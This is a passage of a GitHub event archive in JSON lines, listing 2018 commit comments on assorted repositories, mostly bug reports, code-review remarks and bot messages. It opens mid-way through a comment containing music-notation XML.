xml:id=\"note-L27F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L27F1S3\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L28F1\" dur=\"32\">\r\n                                            <note xml:id=\"note-L28F1S1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L28F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L28F1S3\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L29F1\" dur=\"32\">\r\n                                            <note xml:id=\"note-L29F1S1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L29F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L29F1S3\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L30F1\" dur=\"32\">\r\n                                            <note xml:id=\"note-L30F1S1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L30F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L30F1S3\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                    </beam>\r\n                                    <beam xml:id=\"beam-L31F1-L36F1\">\r\n                                        <chord xml:id=\"chord-L31F1\" dur=\"32\">\r\n                                            <note xml:id=\"note-L31F1S1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L31F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L31F1S3\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L32F1\" dur=\"32\">\r\n                                            <note xml:id=\"note-L32F1S1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L32F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L32F1S3\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L33F1\" breaksec=\"1\" dur=\"32\">\r\n                                            <note xml:id=\"note-L33F1S1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L33F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L33F1S3\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L34F1\" dur=\"32\">\r\n                                            <note xml:id=\"note-L34F1S1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L34F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L34F1S3\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L35F1\" dur=\"32\">\r\n                                            <note xml:id=\"note-L35F1S1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L35F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L35F1S3\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L36F1\" dur=\"32\">\r\n                                            <note xml:id=\"note-L36F1S1\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L36F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L36F1S3\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        </chord>\r\n                                    </beam>\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n"}},"created_at":"2018-07-04T10:44:20Z"}
{"id":"7917711112","type":"CommitCommentEvent","actor":{"login":"flanzana"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29593315,"position":null,"line":null,"path":null,"commit_id":"6ea0a9abe23c06465447bc2b0366e6c794eaefbf","created_at":"2018-07-04T10:44:57Z","updated_at":"2018-07-04T10:44:57Z","author_association":"NONE","body":"Hi! I successfully added new contact, but I found an interesting bug. If I write **Michael**, list is sorted by name - everything is fine. But if I write **michael**, new contact is added to the end of the list. Seems that if name doesn't start with capital letter, it doesn't get sorted by name. How can we fix it?"}},"created_at":"2018-07-04T10:44:57Z"}
{"id":"7917712676","type":"CommitCommentEvent","actor":{"login":"davidpoza"},"repo":{"name":"davidpoza/dps-pantry"},"payload":{"comment":{"id":29593324,"position":null,"line":null,"path":null,"commit_id":"c258a6236d9de70332a29cd4cfa680b6f302ef95","created_at":"2018-07-04T10:45:17Z","updated_at":"2018-07-04T10:45:17Z","author_association":"OWNER","body":"El bug se producia porque no esperaba a obtener el token de sesion en la peticion http al api, para posteriormente setear las claves identity y token en el localStorage\r\n\r\nModificar el localStorage provoca un evento DoCheck que setea el flag identity que a su vez provoca que se muestre con un *ngIf el router-outlet.\r\n\r\nEsto último lanza el ngOnInit del componente lists, que hace la petición http a la api para obtener las listas (y para entonces ya debe tener el token, y asi tener exito).\r\n\r\nEl problema era que se llegaba a la peticion de las listas aún sin obtener el token de sesión."}},"created_at":"2018-07-04T10:45:17Z"}
{"id":"7917721711","type":"CommitCommentEvent","actor":{"login":"bbferka"},"repo":{"name":"robcog-iai/UUtils"},"payload":{"comment":{"id":29593346,"position":28,"line":218,"path":"Source/UConversions/Public/Conversions.h","commit_id":"f9c5a537860723f2c30a12c7ccde714a362d033e","created_at":"2018-07-04T10:47:16Z","updated_at":"2018-07-04T10:47:16Z","author_association":"NONE","body":"@andreihaidu I am just curious. Does this actually work for you; I had to apply another `FRotator hack(90, 90, 0)` to the camera poses to have Z pointing forward etc. "}},"created_at":"2018-07-04T10:47:16Z"}
{"id":"7917726758","type":"CommitCommentEvent","actor":{"login":"satish81"},"repo":{"name":"satish81/maven-project"},"payload":{"comment":{"id":29593352,"position":null,"line":null,"path":null,"commit_id":"5b4fdb6e5d9f2e81e64765f52779fa5e349eb2cd","created_at":"2018-07-04T10:48:18Z","updated_at":"2018-07-04T10:48:18Z","author_association":"OWNER","body":"dummy"}},"created_at":"2018-07-04T10:48:18Z"}
{"id":"7917730867","type":"CommitCommentEvent","actor":{"login":"WangYingYaTou"},"repo":{"name":"WangYingYaTou/CSDN"},"payload":{"comment":{"id":29593356,"position":null,"line":null,"path":null,"commit_id":"22521c91c2a2294b9905197fcc3e57ed7043ea02","created_at":"2018-07-04T10:49:08Z","updated_at":"2018-07-04T10:49:08Z","author_association":"OWNER","body":" csdn"}},"created_at":"2018-07-04T10:49:08Z"}
{"id":"7917731144","type":"CommitCommentEvent","actor":{"login":"satish81"},"repo":{"name":"satish81/maven-project"},"payload":{"comment":{"id":29593357,"position":null,"line":null,"path":null,"commit_id":"5b4fdb6e5d9f2e81e64765f52779fa5e349eb2cd","created_at":"2018-07-04T10:49:10Z","updated_at":"2018-07-04T10:49:10Z","author_association":"OWNER","body":"dummy1"}},"created_at":"2018-07-04T10:49:10Z"}
{"id":"7917732424","type":"CommitCommentEvent","actor":{"login":"satish81"},"repo":{"name":"satish81/maven-project"},"payload":{"comment":{"id":29593360,"position":null,"line":null,"path":null,"commit_id":"5b4fdb6e5d9f2e81e64765f52779fa5e349eb2cd","created_at":"2018-07-04T10:49:26Z","updated_at":"2018-07-04T10:49:26Z","author_association":"OWNER","body":"sasasaa"}},"created_at":"2018-07-04T10:49:26Z"}
{"id":"7917739896","type":"CommitCommentEvent","actor":{"login":"ddt-sawa"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29593371,"position":null,"line":null,"path":null,"commit_id":"5442b208c580680d964dd73f2ec44767fe48f306","created_at":"2018-07-04T10:51:04Z","updated_at":"2018-07-04T10:51:04Z","author_association":"OWNER","body":"Eclipseなどで番号順にファイルが並ぶようにタイトルを変更したところ、新規ファイルとみなされどの部分を修正したかGithhub上で表示されなくなったため、タイトル変更については即取りやめることにしました。"}},"created_at":"2018-07-04T10:51:04Z"}
{"id":"7917741247","type":"CommitCommentEvent","actor":{"login":"Hoanglinhnova"},"repo":{"name":"Hoanglinhnova/betong"},"payload":{"comment":{"id":29593374,"position":null,"line":null,"path":null,"commit_id":"bbe00e25b70cb3831cee1f1cd168657b546f129b","created_at":"2018-07-04T10:51:23Z","updated_at":"2018-07-04T10:51:23Z","author_association":"OWNER","body":"thi công sàn bê tông nhẹ https://www.sanbetong.vn/"}},"created_at":"2018-07-04T10:51:23Z"}
{"id":"7917745015","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pymapd-feedstock"},"payload":{"comment":{"id":29593379,"position":null,"line":null,"path":null,"commit_id":"8a7c4f8ed754f57c159dc192979cd9d3649f2390","created_at":"2018-07-04T10:52:12Z","updated_at":"2018-07-04T10:52:12Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @andrewseidl were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @andrewseidl were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-04T10:52:12Z"}
{"id":"7917756897","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"dotnet/BenchmarkDotNet"},"payload":{"comment":{"id":29593398,"position":null,"line":null,"path":null,"commit_id":"95750c2734b966fd6db2124440f4a9cca61a4127","created_at":"2018-07-04T10:54:48Z","updated_at":"2018-07-04T10:54:48Z","author_association":"MEMBER","body":"@AndreyAkinshin done! https://github.com/dotnet/BenchmarkDotNet/commit/0f9c48d3eac1cce3122bc53c7d6bd6c9331a1176"}},"created_at":"2018-07-04T10:54:48Z"}
{"id":"7917761240","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29593407,"position":53,"line":55,"path":"idea/src/org/jetbrains/kotlin/idea/search/ideaExtensions/KotlinPropertyAccessorsReferenceSearcher.kt","commit_id":"fa7342fbbf6f1b1303739ef8358122978ea73409","created_at":"2018-07-04T10:55:48Z","updated_at":"2018-07-04T10:55:48Z","author_association":"MEMBER","body":"Yes, I did that intentionally because `propertyNamesByAccessorName` should return empty list whenever `canBePropertyAccessor` returns false"}},"created_at":"2018-07-04T10:55:48Z"}
{"id":"7917764060","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"th-otto/pTOS"},"payload":{"comment":{"id":29593415,"position":4,"line":26,"path":"bios/memory_rpi.S","commit_id":"e6138ce49b553a8fd22593dc5417b2d84fa2b7d7","created_at":"2018-07-04T10:56:28Z","updated_at":"2018-07-04T10:56:28Z","author_association":"OWNER","body":"Yes, but there are still differences, like not calling the (user supplied) reset vector on a \"cold boot\". Also it does not hurt to keep the logic the same as in m68k."}},"created_at":"2018-07-04T10:56:28Z"}
{"id":"7917768283","type":"CommitCommentEvent","actor":{"login":"e9gille"},"repo":{"name":"Dyalog/ride"},"payload":{"comment":{"id":29593421,"position":null,"line":null,"path":null,"commit_id":"6fe45175aad022b961d6663647c3d91e9acca16c","created_at":"2018-07-04T10:57:25Z","updated_at":"2018-07-04T10:57:25Z","author_association":"COLLABORATOR","body":"sure, will do"}},"created_at":"2018-07-04T10:57:25Z"}
{"id":"7917769314","type":"CommitCommentEvent","actor":{"login":"mpoeter"},"repo":{"name":"neunhoef/asiotest"},"payload":{"comment":{"id":29593424,"position":62,"line":62,"path":"worker_test.cpp","commit_id":"edd3502fac3e23764f0fb8e4135060ccde6d5f43","created_at":"2018-07-04T10:57:38Z","updated_at":"2018-07-04T10:57:38Z","author_association":"COLLABORATOR","body":"This probably causes cache thrashing. IMHO it would be better to use the test and test-and-set pattern for a spin lock.."}},"created_at":"2018-07-04T10:57:38Z"}
{"id":"7917776938","type":"CommitCommentEvent","actor":{"login":"ColeMaddison"},"repo":{"name":"ColeMaddison/Lohika_JS_Coding_Camp"},"payload":{"comment":{"id":29593442,"position":2,"line":2,"path":"lohica-js-network/src/actions/reqActions.js","commit_id":"52b8b2b0d6d2128acfa6f092d768fa5484d057a3","created_at":"2018-07-04T10:59:19Z","updated_at":"2018-07-04T10:59:19Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-04T10:59:19Z"}
{"id":"7917778064","type":"CommitCommentEvent","actor":{"login":"bursevich"},"repo":{"name":"bursevich/js-Prefr"},"payload":{"comment":{"id":29593447,"position":89,"line":89,"path":"ninthLesson/HW9-script.js","commit_id":"840cdb89e25446608d08e12643f4fb2549d38e99","created_at":"2018-07-04T10:59:33Z","updated_at":"2018-07-04T10:59:33Z","author_association":"OWNER","body":"исправила"}},"created_at":"2018-07-04T10:59:33Z"}
{"id":"7917784203","type":"CommitCommentEvent","actor":{"login":"ondrejmirtes"},"repo":{"name":"phpstan/phpstan-shim"},"payload":{"comment":{"id":29593469,"position":null,"line":null,"path":null,"commit_id":"0db0041624bd0ccbcf944be6a86880e8663fc3e2","created_at":"2018-07-04T11:00:51Z","updated_at":"2018-07-04T11:00:51Z","author_association":"MEMBER","body":"Wait a few days ;)"}},"created_at":"2018-07-04T11:00:51Z"}
{"id":"7917787780","type":"CommitCommentEvent","actor":{"login":"RonKillerMan"},"repo":{"name":"masvis/angular4-hal"},"payload":{"comment":{"id":29593476,"position":null,"line":null,"path":null,"commit_id":"8b405c590d957eb7451ae4c63fd07a9d86bd4198","created_at":"2018-07-04T11:01:35Z","updated_at":"2018-07-04T11:01:35Z","author_association":"CONTRIBUTOR","body":"It's not worked any more.The function className returns a worng array of className such as ['e(){xxxxx','t']\r\n"}},"created_at":"2018-07-04T11:01:35Z"}
{"id":"7917788813","type":"CommitCommentEvent","actor":{"login":"friuns2"},"repo":{"name":"subdavis/Tusk"},"payload":{"comment":{"id":29593480,"position":null,"line":null,"path":null,"commit_id":"243f1508d6b25803c24e37bacf6c3c2d3405f30d","created_at":"2018-07-04T11:01:49Z","updated_at":"2018-07-04T11:01:49Z","author_association":"NONE","body":"is it stable, can i use creating new passwords in this version?"}},"created_at":"2018-07-04T11:01:49Z"}
{"id":"7917789291","type":"CommitCommentEvent","actor":{"login":"futurejones"},"repo":{"name":"apple/swift-compiler-rt"},"payload":{"comment":{"id":29593482,"position":null,"line":null,"path":null,"commit_id":"4ca89b7a97fc9d9bd8ca00e7d7bfd114d85fc29c","created_at":"2018-07-04T11:01:55Z","updated_at":"2018-07-04T11:01:55Z","author_association":"NONE","body":"Hard coding x86_64 in lib/fuzzer/tests/CMakeLists.txt is causing build failures on non x86 machines such as AArch64\r\n\r\n```\r\n+# libFuzzer unit tests are only run on the host machine.\r\n+set(arch \"x86_64\")\r\n```\r\nThis is a know issue as reported here - [[Fuzzer] Don't hardcode target architecture for Fuzzer tests](https://reviews.llvm.org/D48207)\r\n\r\nCan we get this fixed please."}},"created_at":"2018-07-04T11:01:55Z"}
{"id":"7917793243","type":"CommitCommentEvent","actor":{"login":"mpoeter"},"repo":{"name":"neunhoef/asiotest"},"payload":{"comment":{"id":29593492,"position":58,"line":58,"path":"worker_test.cpp","commit_id":"edd3502fac3e23764f0fb8e4135060ccde6d5f43","created_at":"2018-07-04T11:02:47Z","updated_at":"2018-07-04T11:02:47Z","author_association":"COLLABORATOR","body":"This store should use `memory_order_release`, which translates to a simple `mov` instruction. By default all atomic instructions use `memory_order_seq_cst`, which in this case would translate to an unnecessary expensive `lock xchg` instruction."}},"created_at":"2018-07-04T11:02:47Z"}
{"id":"7917795462","type":"CommitCommentEvent","actor":{"login":"wx-ta"},"repo":{"name":"fifteenhex/sx127x"},"payload":{"comment":{"id":29593499,"position":null,"line":null,"path":null,"commit_id":"90fcb7879e106b6e47b09d654fc663d98f402e49","created_at":"2018-07-04T11:03:16Z","updated_at":"2018-07-04T11:03:16Z","author_association":"NONE","body":"hi，\r\n      very thanks for your code !\r\n      i hava a question need to ask you, as we know,the kernel will close the global irq for some thing needed;\r\n      if the sx127x received a packet and generate a irq when global irq is off, so,the driver's  code that clear sx127x RXDONE irq cannot  be called, do this case lead RXDONE signal(sx127x DIO0 Pin) push high level forever? do it leads the driver cannot receive packet forever?\r\n       my viewpoint may not correct... thanks for your reading!\r\ne-mail: wx-ta@163.com"}},"created_at":"2018-07-04T11:03:16Z"}
{"id":"7917803355","type":"CommitCommentEvent","actor":{"login":"gvanem"},"repo":{"name":"merbanan/rtl_433"},"payload":{"comment":{"id":29593516,"position":8,"line":147,"path":"src/rtl_433.c","commit_id":"c30a2a66bffdff6a58c722661434ee18e8cbff99","created_at":"2018-07-04T11:05:00Z","updated_at":"2018-07-04T11:05:00Z","author_association":"CONTRIBUTOR","body":"Doesn't good old syslog use port 514? According to [IANA](https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml) anyway."}},"created_at":"2018-07-04T11:05:00Z"}
{"id":"7917807359","type":"CommitCommentEvent","actor":{"login":"terjeio"},"repo":{"name":"gerritv/Grbl-Panel"},"payload":{"comment":{"id":29593522,"position":null,"line":null,"path":null,"commit_id":"80366b2fd2ad9edbb571291ab5711dbd7a6ff5a2","created_at":"2018-07-04T11:05:53Z","updated_at":"2018-07-04T11:05:53Z","author_association":"NONE","body":"Enhanchment request for code in GrblUtils.vb:\r\n\r\nThe constants in the following code segment should preferably be replaced with values from the [OPT: report?\r\n\r\n``` Visual Basic\r\nCase \"Bf\"\r\n                            \r\n    Dim values = Split(portion(1), \",\")\r\n    Try\r\n        prgBarQ.Value = 15 - values(0)\r\n        prgbRxBuf.Value = 128 - values(1)\r\n    Catch\r\nEnd Try\r\n```\r\n\r\nTerje"}},"created_at":"2018-07-04T11:05:53Z"}
{"id":"7917812360","type":"CommitCommentEvent","actor":{"login":"hanyoungkim"},"repo":{"name":"hanyoungkim/lucas_house"},"payload":{"comment":{"id":29593530,"position":null,"line":null,"path":null,"commit_id":"7db57243072d201ed9e5e1af5d989618ded7f994","created_at":"2018-07-04T11:07:02Z","updated_at":"2018-07-04T11:07:02Z","author_association":"OWNER","body":"성재 버튼 쓰기"}},"created_at":"2018-07-04T11:07:02Z"}
{"id":"7917813946","type":"CommitCommentEvent","actor":{"login":"ColeMaddison"},"repo":{"name":"ColeMaddison/Lohika_JS_Coding_Camp"},"payload":{"comment":{"id":29593536,"position":28,"line":28,"path":"lohica-js-network/src/actions/userAccountActions.js","commit_id":"52b8b2b0d6d2128acfa6f092d768fa5484d057a3","created_at":"2018-07-04T11:07:25Z","updated_at":"2018-07-04T11:07:25Z","author_association":"OWNER","body":"have to use another then, because the res.json in the first then is a resolved promise, after returning it and getting as parameter i can get the resolved data from the promise"}},"created_at":"2018-07-04T11:07:25Z"}
{"id":"7917817322","type":"CommitCommentEvent","actor":{"login":"hanyoungkim"},"repo":{"name":"hanyoungkim/lucas_house"},"payload":{"comment":{"id":29593544,"position":null,"line":null,"path":null,"commit_id":"62cc2ad79bf7f164b81cc89fdaada938183dc51f","created_at":"2018-07-04T11:08:11Z","updated_at":"2018-07-04T11:08:11Z","author_association":"OWNER","body":"상원 기수 변경"}},"created_at":"2018-07-04T11:08:11Z"}
{"id":"7917819602","type":"CommitCommentEvent","actor":{"login":"hanyoungkim"},"repo":{"name":"hanyoungkim/lucas_house"},"payload":{"comment":{"id":29593557,"position":null,"line":null,"path":null,"commit_id":"e0feca49219d9f907077b6da5f0783879738c490","created_at":"2018-07-04T11:08:43Z","updated_at":"2018-07-04T11:08:43Z","author_association":"OWNER","body":"현재 변경"}},"created_at":"2018-07-04T11:08:43Z"}
{"id":"7917819745","type":"CommitCommentEvent","actor":{"login":"solnsubuga"},"repo":{"name":"andela/hc-wits-kla"},"payload":{"comment":{"id":29593560,"position":21,"line":82,"path":"hc/api/management/commands/sendalerts.py","commit_id":"837637f89dfdc0d7e786300ee0f50c6141270e57","created_at":"2018-07-04T11:08:45Z","updated_at":"2018-07-04T11:08:45Z","author_association":"COLLABORATOR","body":"@RrNn, this line is longer than our agreed standard of maximum string length 79."}},"created_at":"2018-07-04T11:08:45Z"}
{"id":"7917820493","type":"CommitCommentEvent","actor":{"login":"DarkBoyOKI"},"repo":{"name":"nabilbaihaqi/PSBO"},"payload":{"comment":{"id":29593564,"position":null,"line":null,"path":null,"commit_id":"02dfa5248bb9df37ff6d642481e4c20b718a4d76","created_at":"2018-07-04T11:08:55Z","updated_at":"2018-07-04T11:08:55Z","author_association":"NONE","body":"kalo diagram langsung ke repo asli aja gpp"}},"created_at":"2018-07-04T11:08:55Z"}
{"id":"7917820679","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-tomita/meikai_java_2018_04"},"payload":{"comment":{"id":29593565,"position":null,"line":null,"path":null,"commit_id":"0cc3651ac4654050639c332c8792d1c4b18b4fa4","created_at":"2018-07-04T11:08:58Z","updated_at":"2018-07-04T11:08:58Z","author_association":"COLLABORATOR","body":"浅田\r\n可読性の観点から見るとfor文のほうが良いと思います。\r\n今回のような判定用の値が1週ごとに増減するようなものに関してはまさにfor文が適切です。\r\nwhile文だけ見ると無限ループのように感じる方もいるので。"}},"created_at":"2018-07-04T11:08:58Z"}
{"id":"7917822184","type":"CommitCommentEvent","actor":{"login":"mgorny"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":29593568,"position":null,"line":null,"path":null,"commit_id":"559c529b86b3782ab86d0852f52128e334819b84","created_at":"2018-07-04T11:09:20Z","updated_at":"2018-07-04T11:09:20Z","author_association":"MEMBER","body":"test comment"}},"created_at":"2018-07-04T11:09:20Z"}
{"id":"7917824505","type":"CommitCommentEvent","actor":{"login":"hanyoungkim"},"repo":{"name":"hanyoungkim/lucas_house"},"payload":{"comment":{"id":29593574,"position":null,"line":null,"path":null,"commit_id":"14b2a1c20e4bd77b1abdf8eb6299adb2d56ee741","created_at":"2018-07-04T11:09:51Z","updated_at":"2018-07-04T11:09:51Z","author_association":"OWNER","body":"현재 글자 변경"}},"created_at":"2018-07-04T11:09:51Z"}
{"id":"7917826935","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"janekptacijarabaci/UXP"},"payload":{"comment":{"id":29593583,"position":null,"line":null,"path":null,"commit_id":"be8bb909c9f2ff2614ffa8a403016ae0196e6881","created_at":"2018-07-04T11:10:23Z","updated_at":"2018-07-04T11:10:23Z","author_association":"OWNER","body":"``` javascript\r\n\"use strict\";\r\n\r\nvar arr = new Uint8Array(0);\r\n\r\n// Actual results: true\r\n// Expected results: false\r\nconsole.log(Reflect.defineProperty(arr, -1, {value:2}));\r\nconsole.log(Reflect.defineProperty(arr, 1, {value:2}));\r\nconsole.log(Reflect.set(arr, -1, 2));\r\nconsole.log(Reflect.set(arr, 1, 2));\r\n\r\n// 2\r\nconsole.log(arr[1] = 2);\r\n```\r\n"}},"created_at":"2018-07-04T11:10:23Z"}
{"id":"7917829117","type":"CommitCommentEvent","actor":{"login":"shravyabss"},"repo":{"name":"shravyabss/Git-hub-tutorial"},"payload":{"comment":{"id":29593588,"position":1,"line":1,"path":"README.md","commit_id":"5ea833a328a5846be866bc986fde4e4fadf96048","created_at":"2018-07-04T11:10:52Z","updated_at":"2018-07-04T11:10:52Z","author_association":"OWNER","body":"Comment1"}},"created_at":"2018-07-04T11:10:52Z"}
{"id":"7917833488","type":"CommitCommentEvent","actor":{"login":"felixangell"},"repo":{"name":"HandsFree/beaconing-teacher-ui"},"payload":{"comment":{"id":29593610,"position":9,"line":13,"path":"frontend/src/modules/calendar/root/calendar/index.js","commit_id":"e270b7a7edb6d7bc5690a1f75cd8d0cbbf8c0607","created_at":"2018-07-04T11:11:50Z","updated_at":"2018-07-04T11:11:50Z","author_association":"MEMBER","body":"Ahh just felt it was a little anti D.R.Y. But see my comments in the related issue"}},"created_at":"2018-07-04T11:11:50Z"}
{"id":"7917836796","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone-react"},"payload":{"comment":{"id":29593620,"position":null,"line":null,"path":null,"commit_id":"cec4b33f5b32a15544eb5f76812f864769c8120c","created_at":"2018-07-04T11:12:31Z","updated_at":"2018-07-04T11:12:31Z","author_association":"NONE","body":"Rob Gietema your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-04T11:12:31Z"}
{"id":"7917840724","type":"CommitCommentEvent","actor":{"login":"iaguera"},"repo":{"name":"lPegz/poc-attributes-restful"},"payload":{"comment":{"id":29593624,"position":33,"line":33,"path":"README.md","commit_id":"dc62ecf846e55fa93d441d9c3c69883f97163a8c","created_at":"2018-07-04T11:13:24Z","updated_at":"2018-07-04T11:13:24Z","author_association":"NONE","body":"Oi amiguinho! Que os raios de sol ilumine seu coração."}},"created_at":"2018-07-04T11:13:24Z"}
{"id":"7917844362","type":"CommitCommentEvent","actor":{"login":"blackakula"},"repo":{"name":"blackakula/redux-composite-demo"},"payload":{"comment":{"id":29593635,"position":45,"line":40,"path":"src/index.js","commit_id":"8cf3ecda7e133255d4e9e8713ee85c0daab38d28","created_at":"2018-07-04T11:14:13Z","updated_at":"2018-07-04T11:14:13Z","author_association":"OWNER","body":"Because the global state data structure is like:\r\n```\r\n[\r\n  {\r\n    textarea: {todos: string[], highlited: bool},\r\n    buttons: [\r\n      {clicked: bool},\r\n      {clicked: bool},\r\n      {clicked: bool}\r\n    ]\r\n  },\r\n  {\r\n    textarea: {todos: string[], highlited: bool},\r\n    buttons: [\r\n      {clicked: bool},\r\n      {clicked: bool}\r\n    ]\r\n  }\r\n]\r\n```\r\nSo, access it accordingly. Another way is to subscribe like this:\r\n```\r\n    composite.subscribe([\r\n        undefined,\r\n        {\r\n            textarea: ({getState}) => {\r\n                if (getState().todos.length === 3) {\r\n                    unsubscribe[1]()\r\n                }\r\n            }\r\n        }\r\n    ])\r\n```\r\nWithout dot notation. Is it better? Your choise."}},"created_at":"2018-07-04T11:14:13Z"}
{"id":"7917846520","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29593639,"position":null,"line":null,"path":null,"commit_id":"a2625c36a08f15cb7ca82d53ece7401b6ff70eb1","created_at":"2018-07-04T11:14:39Z","updated_at":"2018-07-04T11:14:39Z","author_association":"COLLABORATOR","body":"This is one of the strange behaviour I also saw... I think that can happen because of the render thread. The render thread changes BW levels and the slider does also... maybe also at a time where we don't think it happens... dual iso is slow, the slider and the value can be moved while dual iso calculates... With a single value change that is no problem, but when you drag the slider you'll change the value more than once."}},"created_at":"2018-07-04T11:14:39Z"}
{"id":"7917854625","type":"CommitCommentEvent","actor":{"login":"taitetsu"},"repo":{"name":"movabletype/movabletype"},"payload":{"comment":{"id":29593665,"position":8,"line":139,"path":"lib/MT/ArchiveType/ContentTypeAuthor.pm","commit_id":"e614c70df345bf8de809b3fe982fecdaae425484","created_at":"2018-07-04T11:16:25Z","updated_at":"2018-07-04T11:16:25Z","author_association":"MEMBER","body":"https://www.movabletype.jp/documentation/appendices/tags/contents.html\r\n>初期値は 10 です。\r\nとなっているので、!$limit の場合にも 10 が入るのかと勘違い。\r\n!$limit のときは、No limit で問題ないというか、そうしないと困るケースがある気がするので、そのように対応します。\r\nその場合、\r\n>初期値は 10 です。\r\nの表記は違うと思うんだけど、どうだろう。"}},"created_at":"2018-07-04T11:16:25Z"}
{"id":"7917855512","type":"CommitCommentEvent","actor":{"login":"tomwhoiscontrary"},"repo":{"name":"tim-group/stackbuilder"},"payload":{"comment":{"id":29593667,"position":null,"line":null,"path":null,"commit_id":"49079519bfca7d77dcc3949b91c6040632608b2c","created_at":"2018-07-04T11:16:37Z","updated_at":"2018-07-04T11:16:37Z","author_association":"NONE","body":"Merge to all other repos."}},"created_at":"2018-07-04T11:16:37Z"}
{"id":"7917862971","type":"CommitCommentEvent","actor":{"login":"currolozano"},"repo":{"name":"currolozano/currolozano.github.io"},"payload":{"comment":{"id":29593683,"position":1,"line":1,"path":"todo.html","commit_id":"f5cacea360acdee37db6ec5bd314556bb1610b99","created_at":"2018-07-04T11:18:17Z","updated_at":"2018-07-04T11:18:17Z","author_association":"OWNER","body":"/*comienzo de la pagina"}},"created_at":"2018-07-04T11:18:17Z"}
{"id":"7917866746","type":"CommitCommentEvent","actor":{"login":"liyanping111"},"repo":{"name":"liyanping111/liyanping"},"payload":{"comment":{"id":29593697,"position":null,"line":null,"path":null,"commit_id":"23378f41003af84f1ba37e350bfb5223e2ce3609","created_at":"2018-07-04T11:19:10Z","updated_at":"2018-07-04T11:19:10Z","author_association":"OWNER","body":"gyjyn "}},"created_at":"2018-07-04T11:19:10Z"}
